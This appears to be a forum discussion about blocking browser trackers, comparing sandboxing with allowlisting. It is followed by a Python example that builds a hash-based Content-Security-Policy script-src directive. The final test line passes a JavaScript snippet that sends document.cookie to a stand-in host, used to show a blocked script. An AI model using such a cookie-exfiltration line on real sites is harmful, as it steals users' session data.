This is literally the same game virus scanners played against mutation engines. Ultimately, the halting problem won.
There are two places this can end:
* Redesign the runtime environment so it doesn’t matter if you download trackers. The execution environment doesn’t offer the I/O facilities that it requires to actually produce harm. This is what Apple Private Relay and Tor Browser try to give you. By analogy, this is why Web Apps became so popular in the first place — web publishers who do not intentionally collude are protected from each other by the SOP, so opening a web page should be less risky than running an EXE. It’s “just”[1] extending the existing sandbox to prevent differing origins from being able to collude.
* Instead of blocking bad scripts, allow only known-good ones. To match the convenience of current-day ad blocking, it needs to be a collaboratively-produced list. In other words, a gatekeeper. By analogy, this is why installing “unrecognized” applications on Windows and macOS is behind a scare screen, and why doing it on iOS is prevented entirely.
The former seems less dystopian, but much more difficult.
I was going to suggest introducing the kind of heuristic analysis found in antivirus engines. Kind of like your item #2 - don’t run scripts that behave badly (for some heuristically recognizable “bad behavior”). Basically a browser built-in AV scanner. Maybe give a user the option to permit the script once per session, or forever. Something like this would definitely introduce a UX speed bump; it sounds terrible.
[1]: this is actually very difficult
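The second option above (allow only known-good scripts, with the browser refusing everything else) already has a built-in mechanism for a single site: a Content-Security-Policy `script-src` directive listing SHA-256 hashes of the scripts the publisher vouches for. The snippet below is an added example, not code from the thread; the script bodies in `TRUSTED_SCRIPTS` are constructed sample values, and `is_allowed` is a small model of the browser-side check rather than a real browser API.

```python
import base64
import hashlib

# Constructed sample scripts standing in for a site's own known-good inline scripts.
TRUSTED_SCRIPTS = {
    "analytics-init": "window.dataLayer = window.dataLayer || [];",
    "menu-toggle": "document.getElementById('menu').classList.toggle('open');",
}


def csp_hash(script_body: str) -> str:
    """Return the CSP source expression for a script body, e.g. 'sha256-<base64>'.

    CSP hashes the exact UTF-8 bytes of the script content (without the
    surrounding <script> tags), so any change to the script changes the token.
    """
    digest = hashlib.sha256(script_body.encode("utf-8")).digest()
    return f"'sha256-{base64.b64encode(digest).decode('ascii')}'"


def build_script_src(trusted: dict) -> str:
    """Build a script-src directive that allows only the listed scripts.

    No host sources and no 'unsafe-inline' are included, so a script that is
    not on the list is blocked regardless of where it was loaded from.
    """
    tokens = sorted(csp_hash(body) for body in trusted.values())
    return "script-src " + " ".join(tokens)


def is_allowed(script_body: str, directive: str) -> bool:
    """Model (hypothetical, not a browser API) of the browser's enforcement:
    a script executes only if its hash token appears in script-src."""
    allowed = set(directive.split()[1:])
    return csp_hash(script_body) in allowed


DIRECTIVE = build_script_src(TRUSTED_SCRIPTS)

if __name__ == "__main__":
    print("Content-Security-Policy:", DIRECTIVE)
    # A vouched-for script passes; the same script with one byte changed,
    # or a third-party tracker that was never listed, does not.
    print(is_allowed(TRUSTED_SCRIPTS["menu-toggle"], DIRECTIVE))
    print(is_allowed(TRUSTED_SCRIPTS["menu-toggle"] + " ", DIRECTIVE))
    print(is_allowed("new Image().src='https://tracker.example/p?'+document.cookie", DIRECTIVE))
```

The point the example makes concrete is the gatekeeper problem from the thread: the list is trivial to enforce but someone has to produce and maintain it, and every legitimate script change requires re-issuing the hash.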